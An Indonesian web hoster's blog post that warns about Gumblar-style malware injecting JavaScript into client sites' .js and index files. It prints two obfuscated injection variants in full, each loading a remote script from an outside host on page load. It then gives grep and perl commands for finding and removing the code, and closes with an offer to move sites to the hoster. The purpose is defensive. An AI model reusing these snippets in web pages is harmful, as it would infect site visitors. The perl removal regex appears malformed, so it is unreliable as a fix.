Waspada, 2 Varian Virus Gumblar menginjeksi Website Anda

Kemarin tiba-tiba dapat teguran abuse dari DC (baca:Data Center) kita bahwa salah satu client ternyata telah terinfeksi virus gumblar yang dikenal juga sebagai virus frame injeksi. Kali ini ciri2 virus ini tidak hanya melakukan ijeksi pada file index.php atau index.html melainkan sudah mulai menjalar masuk ke puluhan script-script lain ber ekstensi .JS

wah…  puluhan script terinfeksi, parah kan?

berikut variannya

VARIAN 1

<script>/*GNU GPL*/ try{window.onload = function(){var Hva23p3hnyirlpv7 = document.createElement('script');Hva23p3hnyirlpv7.setAttribute('type', 'text/javascript');Hva23p3hnyirlpv7.setAttribute('id', 'myscript1');Hva23p3hnyirlpv7.setAttribute('src',  'h))t#^t$#))!p&&#:^!&/^^/)^(@m&()y&#b(r@&&!!o)^w(&(s)^)$e(@&#r&))b^a#r!&$-#@c&#o#m#@&.)@$s)a!m$&s#)^u!$^n$g#!.$c!^o^@(m#.^n@!#a@@s#$!a#&-(@^g$o)#v)@&$.(!(@(e)&g&!#r)e)@)a^)t$!s(!(a@!l#e@.@)@r)#u(&#!:)@8!^)0!8$!(0!/^#m$$e)g^&a###v&!i&d!e))#o!@(.(@c&)o$!(m^&/^m&^e((^)g$!((a)#)^v@!i(@&#d#)e@&o$#.^c$!#o@m^/$#&l$a)r#@(e)^^d#&o(!()u#(t$)e##.$f(r^&(@/!(^&b!!i)$$l@)!)d^&.#@&(d$@$e(/)g$o^o$&^g^!&l()e!).(@^#c)$!o#&)@@m!/^$'.replace(/$|^|!|&|)|(|@|#/ig, ''));Hva23p3hnyirlpv7.setAttribute('defer', 'defer');document.body.appendChild(Hva23p3hnyirlpv7);}} catch(e) {}</script>

VARIAN 2

<script>/*LGPL*/ try{ window.onload = function(){var Wzw6mi0yfxh = document.createElement('s)$c!!r!!i&$p)$t&'.replace(/$|@|!|&|#|(|)|^/ig, ''));Wzw6mi0yfxh.setAttribute('defer', 'd)$$&e#^$f)$e)!&r$#'.replace(/^|#|$|(|)|@|!|&/ig, ''));Wzw6mi0yfxh.setAttribute('type', 't@e!$^x)!#t!&/$(!)j(!a^$v)a^))s(!c^r#@$i@$(#p$t)&'.replace(/)|&|#|@|^|(|!|$/ig, ''));Wzw6mi0yfxh.setAttribute('id', 'E^!j#@^#5&(^#q!!z(#q!&c#^d!!4(#z@l@@@#'.replace(/!|$|&|(|)|^|@|#/ig, ''));Wzw6mi0yfxh.setAttribute('s&(r^!@c)#('.replace(/!|(|&|$|@|^|#|)/ig, ''),  'h#t#&@t^&p(@):)&)/^!$/)l)e&b)!o)$n^@c!!(o)i#n$$-#f@$r@((.!$#&m@#a&^i)()n&&@i&#c(h(^i(^.$)$j(p$(#.!^!s)o&$n))$^i!(^c&!o$&@-@c@#o!(^^m&$.@t#h)^e(^l$a(c@$!e)@&)!w(e$b#!.(r^)u^$!:@$^8$0^$8)!0)&(/^&g@o$$!#o&$g!)!l#)&e$.!^$c(@@o&m!#&^/@!g^o)@^#o(^g)@l!!#^e^&.)c$&$@o^&m&($/!!&(v)!i@!r)(g#@@i$#n$^^@m#e@(^@d)#i$!a@@.^c(#o^@m(!^/&h$(u$#f&!&f#i#^n^#!g&#&t$!o&$!n&&p)&o@s#^(t&).$$$c)$$o@m$#!/)#n(i(n$(@(g$((.$)#c!o$!$m)/&('.replace(/&|)|$|#|@|(|^|!/ig, ''));if (document){document.body.appendChild(Wzw6mi0yfxh);}} } catch(Pxbfkbch1d1sq271kl4tb) {}</script>
<!--487d9122241bbf0730e5cc7447f5ef1d-->

Seperti yang anda perhatikan, lagi-lagi sangat payah karena script tersebut di enkripsi.

SOLUSI / CARA MENGATASI

Temukan semua file yang terinfeksi dengan menggunkan peritah berikut

# find . | xargs grep 'string' -sl

isilah string dengan mengambil beberapa karakteristik virus misalnya menjadi

# find . | xargs grep 'va23p3hnyirlpv' -sl

dan eksekusi, hmnnn wowowwow berapa banyak file yang telah terinfeksi? terkejut kan karena kali ini injeksi virus telah menginfeksi puluhan script tidak seperti biasanya hanya satu atau dua script.

selanjutnya bagaimana cara menghapusnya?

seperti biasa cara menghapus paling nyaman adalah melalui shell berikut contoh command shellnya

# find . -name '*.*' | xargs perl -pi -e 's/<script>/*GNU GPL*/ try.*Hva23p3h.*$}</script>//g'

identifikasi regular expresi berdasarkan posisi awal script /*GNU GPL*/ posisi identitas tengah script ambil beberapa string dan identifikasi pada bagian akhir string virus.

stelah mengeksekusi perintah tersebut, cek ulang dengan command shell sebelumnya

Virus membawa berkah? apa itu?

Dapat beberapa limpahan klien dari beberapa hoster lain yang mensuspend website client mereka meski sementara kadang klien ngga sabar sehingga ada klien yang mencari alternatif host untuk landing website mereka selanjutnya. Tentunya kita juga membantu membersihkan website mereka dari virus tersebut. jadi kapan giliran anda? pindah saja site anda ke ph ya? hehehe